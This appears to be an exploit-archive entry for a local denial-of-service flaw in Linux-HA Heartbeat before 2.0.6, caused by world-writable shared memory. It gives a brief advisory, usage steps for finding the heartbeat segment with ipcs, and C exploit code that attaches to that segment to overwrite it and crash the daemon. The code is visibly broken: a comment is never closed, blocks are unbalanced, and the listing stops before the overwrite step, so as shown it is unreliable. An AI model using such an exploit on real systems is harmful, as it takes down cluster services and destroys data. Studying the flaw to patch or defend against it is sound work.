// source: https://www.securityfocus.com/bid/19186/info
Since Linux-HA Heartbeat has insecure default permissions set on shared memory, local attackers may be able to cause a denial of service.
Exploitation would most likely result in a system crash, loss of data, and resource exhaustion, leading to a denial of service if critical files are accessed improperly or overwritten in the attack. Other attacks may be possible as well.
/* Intruders Tiger Team Security
* http://www.intruders.org.br/
* Heartbeat < 2.0.6 Insecure Shared Memory - Local Denial of Service.
* Credits: Yan Rong Ge, see link below:
* http://secunia.com/advisories/21162/
* Tested on Heartbeat 2.0.5.
* Thanks for Wendel Guglielmetti, Waldemar Nehgme,
* Joao Arquimedes, Ricardo BSD and Vitor, Intruders
* Tiger Team Security.
* Usage:
* [security@mail1 tmp]$ ipcs
* ------ Shared Memory Segments --------
* key shmid owner perms bytes nattch status
* 0x00000000 1638402 root 666 7296 6 dest
* ------ Semaphore Arrays --------
* ....
* Get shmid of heartbeat(look perms == 666, this is wrong!!!:))
* [security@mail1 tmp]$ ./itts_sharedex2 1638402 "Intruders Tiger Team Security.."
* The heartbeat�s process will droped.
* Brazil, July/2006.
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
int main(int argc, char *argv[]){
int shmid;
char *shm;
if(argc < 2){
printf("Heartbeat Insecure Shared Memory Exploit by Nash Leon\n");
printf("Usage: %s <target_shmid> <trash>\n", argv[0]);
shmid = atoi(argv[1]);
if ((shm = shmat(shmid, NULL, 0)) == (char *) -1) {
printf("Check now heartbeat pid or shared memory\n");
printf("Running ps auxww | grep heartbeat or ipcs again.\n\n");